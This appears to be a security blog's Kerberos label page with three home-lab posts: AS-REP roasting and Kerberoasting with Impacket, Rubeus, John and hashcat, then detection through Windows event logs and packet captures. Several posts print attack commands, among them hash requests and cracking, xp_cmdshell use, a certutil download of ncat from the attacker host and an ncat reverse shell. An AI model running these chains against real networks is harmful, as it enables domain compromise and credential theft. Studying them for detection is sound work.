Showing posts with label Kerberos. Show all posts
Showing posts with label Kerberos. Show all posts

Sunday, January 2, 2022

Analyzing the logs and packets from a post Kerberoasting activity

In the previous post, I did the Kerberoasting attack. The log entry at the time of running impacket-mssqlclient did not show me anything that I thought was immediately interesting. Actually it instead surprised me. I was really hoping to see information such as the Workstation Name, Source Network Address, Source Port. Especially when the Logon Type is reported as 3 below. 

An account was successfully logged on.

Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		SECURITYNIK\sql-service
	Account Name:		sql-service
	Account Domain:		SECURITYNIK
	Logon ID:		0x4F4F11
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Process Information:
	Process ID:		0x0
	Process Name:		-

Network Information:
	Workstation Name:	-
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		NtLmSsp 
	Authentication Package:	NTLM
	Transited Services:	-
	Package Name (NTLM only):	NTLM V2
	Key Length:		0


This event is generated when a logon session is created. It is generated on the computer that was accessed.
...

Looking at another entry did peek my interest though. Why would sqlservr.exe be spawning cmd.exe with command line "C:\Windows\system32\cmd.exe" /c whoami. This is definitely more interesting than the above entry.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x123c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c whoami

Next up, we see cmd.exe executing the whoami.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1724
	New Process Name:	C:\Windows\System32\whoami.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x123c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	whoami

Here we see the Domain Admins group being enumerated.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x360
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c net groups "Domain Admins"

Here we see the hosts downloading ncat.exe via Certutil.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1598
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe

Here is what it looked like when the ncat was executed.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xc6c
	New Process Name:	C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1578
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe  10.0.0.107 443 --ssl --exec cmd.exe

While I was looking at the logs to see what transpired, I was also capturing packets using the following:

┌──(rootđź’€securitynik)-[~/packets]
└─# tcpdump -nnt --interface eth0 -w impacket-sql.pcap '(host 10.0.0.5) and not(arp or ip6 or port(1900))' -vv
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
^C2841 packets captured
2841 packets received by filter
0 packets dropped by kernel

Interestingly, I thought most of the communication was encrypted but I was wrong. As I looked at a few packets, I could see the queries I executed.

Looking at the type of packets captured.

┌──(rootđź’€securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -q -z io,phs

===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:2841 bytes:4068111
  ip                                     frames:2841 bytes:4068111
    tcp                                  frames:2835 bytes:4066653
      tds                                frames:90 bytes:460551
        _ws.malformed                    frames:7 bytes:2500
        tcp.segments                     frames:2 bytes:12052
      tds.prelogin                       frames:1 bytes:320
        tds.prelogin                     frames:1 bytes:320
      data                               frames:135 bytes:8100
      http                               frames:4 bytes:11948
        media                            frames:2 bytes:11564
          tcp.segments                   frames:2 bytes:11564
      tls                                frames:827 bytes:121673
    udp                                  frames:6 bytes:1458
      nbdgm                              frames:6 bytes:1458
        smb                              frames:6 bytes:1458
          mailslot                       frames:6 bytes:1458
            browser                      frames:6 bytes:1458
===================================================================

Looking at the tds messages, first up the "type == 1"

┌──(rootđź’€securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 1'
   20   9.933875   10.0.0.107 → 10.0.0.5     TDS 316 SQL batch
   24  17.281790   10.0.0.107 → 10.0.0.5     TDS 132 SQL batch
   92 973.952996   10.0.0.107 → 10.0.0.5     TDS 170 SQL batch
   96 981.491834   10.0.0.107 → 10.0.0.5     TDS 168 SQL batch
  100 987.357432   10.0.0.107 → 10.0.0.5     TDS 132 SQL batch
  104 996.015944   10.0.0.107 → 10.0.0.5     TDS 138 SQL batch
  ....

Looking at some of the responses, "type == 4"

┌──(rootđź’€securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 4'
    6   0.101021     10.0.0.5 → 10.0.0.107   TDS 91 Response
   15   0.111340     10.0.0.5 → 10.0.0.107   TDS 333 Response[Malformed Packet]
   17   0.129048     10.0.0.5 → 10.0.0.107   TDS 473 Response
   22  10.135335     10.0.0.5 → 10.0.0.107   TDS 666 Response
   26  17.489552     10.0.0.5 → 10.0.0.107   TDS 173 Response
   94 974.032998     10.0.0.5 → 10.0.0.107   TDS 294 Response
  ....

Looking at some of these messages, I see the commands I executed.

┌──(rootđź’€securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y '(tds.type == 1) || (tds.type == 4)' -T fields -e tds.type -e tds.query -E header=y | moreRunning as user "root" and group "root". This could be dangerous.
tds.type        tds.query
4
4
4
1       exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFI
GURE;\r\n
4
1       exec master..xp_cmdshell 'whoami'\r\n
1       exec master..xp_cmdshell 'net users'\r\n
1       exec master..xp_cmdshell 'net groups "Domain Admins"'\r\n
1       exec master..xp_cmdshell 'certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe'\r\n
1       exec master..xp_cmdshell 'cmd.exe /c "%temp%\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe"'\r\n

I was able to see the responses also. However, in most cases it does not really make sense to post them here.

Ok, that's it for me and this post.

Posted by at No comments:
Labels: , , , , , , , , , ,

Beginning Kerberoasting

In Kerberoasting, we are leveraging the fact that the requested ticket, is encrypted with the password of the service account for which that service is using. Therefore, the objective is to request a ticket for that service and then crack the service account passwords so that the service's credential can be reused.

First up, using the account from the ASP-REQ Roasting post which was just completed, querying the domain for SPN's using impacket-GetUserSPNS.

┌──(rootđź’€securitynik)-[~/packets]
└─# impacket-GetUserSPNs securitynik.local/neysa:Testing1 -target-domain SECURITYNIK.LOCAL                              
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

ServicePrincipalName                     Name              MemberOf  PasswordLastSet             LastLogon                   Delegation 
---------------------------------------  ----------------  --------  --------------------------  --------------------------  ----------
cifs/cifs.securitynik.local              cifs-service                2021-11-10 21:33:08.377237  <never>                                
HTTP/http.securitynik.local:80           http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/http                                http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/http.securitynik.local              http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/www.securitynik.local               kerberos-service            2021-10-22 22:34:26.733216  <never>                                
MSSQLSvc/dc-2019.securitynik.local:1433  sql-service                 2021-11-16 04:58:08.706286  2021-11-16 17:30:56.779153

Requesting a Service Ticket for the account with  MSSQLSvc/dc-2019.securitynik.local:1433.

┌──(rootđź’€securitynik)-[~/packets]
└─# impacket-GetUserSPNs securitynik.local/neysa:Testing1 -target-domain SECURITYNIK.LOCAL -request -outputfile GetUserSPNs.hashes

Leveraging Rubeus to grab the tickets instead from a Windows host.

C:\Tools>Rubeus.exe kerberoast /domain:securitynik.local /outfile:kerberoasting.hashes

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : securitynik.local
[*] Searching path 'LDAP://securitynik.local/DC=securitynik,DC=local' for Kerberoastable users

[*] Total kerberoastable users : 4


[*] SamAccountName         : cifs-service
[*] DistinguishedName      : CN=cifs Service,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : cifs/cifs.securitynik.local
[*] PwdLastSet             : 11/11/2021 2:33:08 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : http-spn
[*] DistinguishedName      : CN=HTTP SPN,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : HTTP/http.securitynik.local:80
[*] PwdLastSet             : 11/9/2021 2:32:04 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : kerberos-service
[*] DistinguishedName      : CN=Kerberos Service,CN=Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : HTTP/www.securitynik.local
[*] PwdLastSet             : 10/23/2021 2:34:26 AM
[*] Supported ETypes       : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : sql-service
[*] DistinguishedName      : CN=SERVICE,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : MSSQLSvc/dc-2019.securitynik.local:1433
[*] PwdLastSet             : 11/16/2021 9:58:08 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes

[*] Roasted hashes written to : C:\Tools\kerberoasting.hashes

Now that we have the hashes from two different tools, I will take the one from Impacket-GetUserSPNS and feed that to John.

┌──(rootđź’€securitynik)-[~/packets]
└─# john GetUserSPNs.hashes 
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Testing1         (?)
Testing1         (?)
Testing1         (?)
Testing1         (?)
4g 0:00:00:00 DONE 2/3 (2021-11-17 22:18) 50.00g/s 198400p/s 793600c/s 793600C/s Tara1..Smurfy1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

John returned the passwords but I'm not sure why it has the (?). 

Leveraging the password Testing1 with username sql-service, against MSSQLSvc/dc-2019.securitynik.local:1433. We need to target the service account which is being used by that SPN. In this case, the service is MSSQL. Let's leverage the Impacket suite once again. This time, using impacket-mssqlclient to target the MSSQL service.

┌──(rootđź’€securitynik)-[~]
└─# impacket-mssqlclient securitynik.local/sql-service:Testing1@10.0.0.5 -windows-auth
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC-2019\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC-2019\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 19162) 
[!] Press help for extra shell commands
SQL>

Now that we are in, let's get some help.

SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL>

Let's execute enable_xp_cmdshell.

SQL> enable_xp_cmdshell
[*] INFO(DC-2019\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC-2019\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

Let's now run a few commands

SQL> xp_cmdshell whoami
output                                                                             

--------------------------------------------------------------------------------   

nt service\mssql$sqlexpress                                                        

NULL

Running something more meaningful.

SQL> xp_cmdshell net groups "Domain Admins"
output                                                                             

--------------------------------------------------------------------------------   

Group name     Domain Admins                                                       

Comment        Designated administrators of the domain                             

NULL                                                                               

Members                                                                            

NULL                                                                               

-------------------------------------------------------------------------------    

3202357359SA             admin                    Administrator                    

ANGELINE_WHITAKER        CARMEN_DURAN             DOREEN_MORIN                     

JACKSON_SOSA             LOUISA_MCPHERSON         MISTY_CALHOUN                    

mysqlsvc                                                                           

The command completed successfully.                                                

NULL                                                                               

NULL

That is all interesting so far. Let's get a ncat shell to come back to my attacking machine.

First up, let's setup a webserver to host ncat.exe. 

┌──(rootđź’€securitynik)-[~]
└─# cd /home/securitynik/WinTools/

┌──(rootđź’€securitynik)-[~/WinTools]
└─# ls ncat.exe
ncat.exe

┌──(rootđź’€securitynik)-[~/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Using certutil to download ncat.exe.

SQL> xp_cmdshell certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe
output                                                                   
--------------------------------------------------------------------------------   

****  Online  ****                                                                 

CertUtil: -URLCache command completed successfully.                                

NULL

Confirming on our attacking machine, that the file was successfully download.

┌──(rootđź’€securitynik)-[~/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.5 - - [18/Nov/2021 02:29:41] "GET /ncat.exe HTTP/1.1" 200 -
10.0.0.5 - - [18/Nov/2021 02:29:41] "GET /ncat.exe HTTP/1.1" 200 -

Next, setup a ncat listener on our attacking machine, only allowing the compromised machine to connect. We also are going to take advantage of SSL to hide our activities while blending in.

┌──(rootđź’€securitynik)-[~]
└─# ncat --verbose --listen 443 -4 --ssl  --allow 10.0.0.5
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 881D 3F3D 0CEC 49A2 6A55 E483 902A C0A3 33BF 068F
Ncat: Listening on 0.0.0.0:443

Connecting from the compromise machine.

SQL> xp_cmdshell cmd.exe /c "%temp%\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe"

Looking at the ncat listener, we now have a shell.

┌──(rootđź’€securitynik)-[~]
└─# ncat --verbose --listen 443 -4 --ssl  --allow 10.0.0.5
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 881D 3F3D 0CEC 49A2 6A55 E483 902A C0A3 33BF 068F
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.0.0.5.
Ncat: Connection from 10.0.0.5:64218.
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

That is good enough for me. Time to move on. I believe I have improved my knowledge about Kerbeorasting.









Posted by at No comments:
Labels: , , , , , ,

Beginning AS-REP Roasting with Impacket and Rubeus

In this post, I'm learning about Kerberos and one of its attacks. Specifically, I'm learning about Authentication Service Response (AS-REP) Roasting. Based on my learnings, this is an attack that should be highly unlikely today, as by default, in Active Directory, it is more likely the feature that enables this attack is disabled. I am, as always, doing this from the perspective of enhancing my learning. In this post, I learned more about Kerberoasting

First up, here is what a normal Active Directory Kerberos authentication looks like within the first 4 packets.

┌──(rootđź’€securitynik)-[~/packets]
└─# tshark -n -r AD-Authentication.pcapng -Y '(kerberos.msg_type == 10) || (kerberos.msg_type == 11) || (kerberos.msg_type == 30)' 
    8  10.244059   10.0.0.108 → 10.0.0.5     KRB5 311 AS-REQ
    9  10.248297     10.0.0.5 → 10.0.0.108   KRB5 258 KRB Error: KRB5KDC_ERR_PREAUTH_REQUIRED
   16  10.259148   10.0.0.108 → 10.0.0.5     KRB5 391 AS-REQ
   17  10.261119     10.0.0.5 → 10.0.0.108   KRB5 2131 AS-REP
  153  28.562552   10.0.0.108 → 10.0.0.5     KRB5 294 AS-REQ

As shown in packet 8, the client makes a request.
In packet 9, the server responds with a KRB ERROR, stating pre-authentication is required. Without this pre-authentication requirement, someone would be able to request Ticket Granting Ticket (TGT) for those users who do not have this feature enabled and then crack the user's password. Once you have the cracked password, then you can authenticate as that user.

Looking at this in practice, from an Active Directory perspective, the user would have to deliberately disable the pre-authentication as shown below.


Let's now leverage a tool from the Impacket suite of tools to see which accounts have pre-authentication disabled. Let's say we have a have access to a low level account that is just a member of Domain Users, we can use that account and impacket-GetNP to learn about users with pre-authentication disabled.

┌──(rootđź’€securitynik)-[~]
└─# impacket-GetNPUsers -dc-ip 10.0.0.5 -ts  securitynik.local/nakia:Testing1
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

Name   MemberOf                                                                       PasswordLastSet             LastLogon                   UAC      
-----  -----------------------------------------------------------------------------  --------------------------  --------------------------  --------
neysa  CN=24-baez64102-admingroup,OU=Groups,OU=SEC,OU=Tier 2,DC=securitynik,DC=local  2021-02-13 17:37:20.397803  2021-11-17 02:18:18.769182  0x410200

Now that we know a user has pre-authentication check disabled, let's request a ticket on this user behalf. At the same time, I will output the contents to a file and provide that file to John to crack.

┌──(rootđź’€securitynik)-[~]
└─# impacket-GetNPUsers -dc-ip 10.0.0.5 -ts  securitynik.local/nakia:Testing1 -request -format john -outputfile no-preauth.john
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

Name   MemberOf                                                                       PasswordLastSet             LastLogon                   UAC      
-----  -----------------------------------------------------------------------------  --------------------------  --------------------------  --------
neysa  CN=24-baez64102-admingroup,OU=Groups,OU=SEC,OU=Tier 2,DC=securitynik,DC=local  2021-02-13 17:37:20.397803  2021-11-17 02:18:18.769182  0x410200

When we cat the file, we see ...

┌──(rootđź’€securitynik)-[~]
└─# cat no-preauth.john 
$krb5asrep$neysa@SECURITYNIK.LOCAL:3032d987619dfe5bba1bda3905f2b61e$ccd95cf20d0eff70f1e7fdadd372ca250451335cd5c30960f7f3f8c1dfa545169c73c31ca970b89ca6c5ee06cdaec5cfaea66fbcdaf0fa8e859fdbd791c9c6cbf9a699cfead4d078cdc48d44a971ebea0c76680e14c21028b5c22c9ef27999f77c867d260967b5fee9eb593a0e2fe6f4ca69188f37bdb36241761a7d4699d2a15a35fdeed80213b33ba95613fb349a9868aa178986891619705fbf6820d4e768a0477fa0964cf5608fa90dea33a2f5da58b74a24b967937fcdc436af26f65699c7b3fdc9f298289b0cb91674575df83f97f33076df7f93853462deb375528fa548aab4fda4ac6f04be421b0c6d46a4fd32585bc4948b

We can now provide the file to John, with our wordlist. 

Before giving the password to John, what did the query look like on the wire.

┌──(rootđź’€securitynik)-[~/packets]
└─# tshark -n -r no-preauth.pcap -Y '(kerberos.msg_type == 10) || (kerberos.msg_type == 11) || (kerberos.msg_type == 30)' 
    4   0.000441   10.0.0.107 → 10.0.0.5     KRB5 246 AS-REQ
    5   0.002625     10.0.0.5 → 10.0.0.107   KRB5 2376 AS-REP

As seen above, there is no pre-authentication message in this capture as was seen in the first capture. 

Feeding the file to John.

┌──(rootđź’€securitynik)-[~]
└─# john --format=krb5asrep no-preauth.john  --wordlist=~/SEC-504/pass.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates left, minimum 16 needed for performance.
Testing1         ($krb5asrep$neysa@SECURITYNIK.LOCAL)
1g 0:00:00:00 DONE (2021-11-17 03:33) 50.00g/s 250.0p/s 250.0c/s 250.0C/s sans..Testing1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Voila, now we have the user's password and username and thus can reuse it to gain access. Let's try listing any shares on the remote machines, using smbclient.

┌──(rootđź’€securitynik)-[~/packets]
└─# smbclient --list=10.0.0.5 --user=SECURITYNIK/neysa%Testing1 --max-protocol SMB3 --encrypt

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Leveraging Rubeus for AS-REP Roasting

Now that I understand how to use Impacket for this, time to look at another tool, Rubeus.

C:\Tools>Rubeus.exe asreproast /format:hashcat /dc:dc-2019.securitynik.local /outfile:asrep-roast.hashes

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4


[*] Action: AS-REP roasting

[*] Target Domain          : securitynik.local
[*] Target DC              : dc-2019.securitynik.local

[*] Searching path 'LDAP://dc-2019.securitynik.local/DC=securitynik,DC=local' for AS-REP roastable users
[*] SamAccountName         : neysa
[*] DistinguishedName      : CN=Neysa,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] Using domain controller: dc-2019.securitynik.local (10.0.0.5)
[*] Building AS-REQ (w/o preauth) for: 'securitynik.local\neysa'
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\Tools\asrep-roast.hashes

[*] Roasted hashes written to : C:\Tools\asrep-roast.hashes

Looking at the contents of the file.

C:\Tools> type asrep-roast.hashes
$krb5asrep$23$neysa@securitynik.local:4F4D040B3DFFBEEAC4761AA7B5F62C11$39EFEBF767A19822771789E8AA0286ACA05383F57F421D12C7D2F12E285F6E4386A3C102C3B252B120B07DE1736B80D27098907D1122C45FA79E2CF48843D16E8F96D2E1F59DFAE340610B2F1EF193D634E5954A83CF340CB003AD4EED34B84DEAF1170750C59C8371DECB21949A61A97D8FD66153527F7322AB5BD54F7285EDAF14BCF6B20C4C6E2480EC859DB8C3D784D7BCC8559FAF6A2DE7C20DAD89FD54CF65ABAC8EA92FFB4F313691DDF7EA3255486092845C3CBEB2B55B569BA5923AAFB15B01379B9C919E43F9F0F321AABFFBD16D53F877A650D65ECA2B56741C5D17BCC73DD69A495AFC94ADF77578629CC9C95750002C

Passing the file to Hashcat. we see the password at the end of the line below.

D:\TOOLS\hashcat-6.2.4>hashcat.exe --attack-mode 0 --hash-type 18200 c:\tmp\asrep-roast.hashes ..\pass.txt
hashcat (v6.2.4) starting
...

$krb5asrep$23$neysa@securitynik.local:4f4d040b3dffbeeac4761aa7b5f62c11$39efebf767a19822771789e8aa0286aca05383f57f421d12c7d2f12e285f66e4386a3c102c3b252b120b07de1736b80d27098907d1122c45fa79e2cf48843d16e8f96d2e1f59dfae340610b2f1ef193d634e5954a83cf340cb003ad4eed34b84deeaf1170750c59c8371decb21949a61a97d8fd66153527f7322ab5bd54f7285edaf14bcf6b20c4c6e2480ec859db8c3d784d7bcc8559faf6a2de7c20dad89fd54cf65aabac8ea92ffb4f313691ddf7ea3255486092845c3cbeb2b55b569ba5923aafb15b01379b9c919e43f9f0f321aabffbd16d53f877a650d65eca2b56741c5d17bcc73ddd69a495afc94adf77578629cc9c95750002c:Testing1

As before, now that we have the password, we can authenticate

C:\Tools>runas /user:securitynik\neysa cmd.exe
Enter the password for securitynik\neysa:
Attempting to start cmd.exe as user "securitynik\neysa" ...



Good start. That was a good piece of learning for me, as I look to expand my knowledge on Kerberos.

References:
Posted by at No comments:
Labels: , , , , , , ,
Subscribe to: Posts (Atom)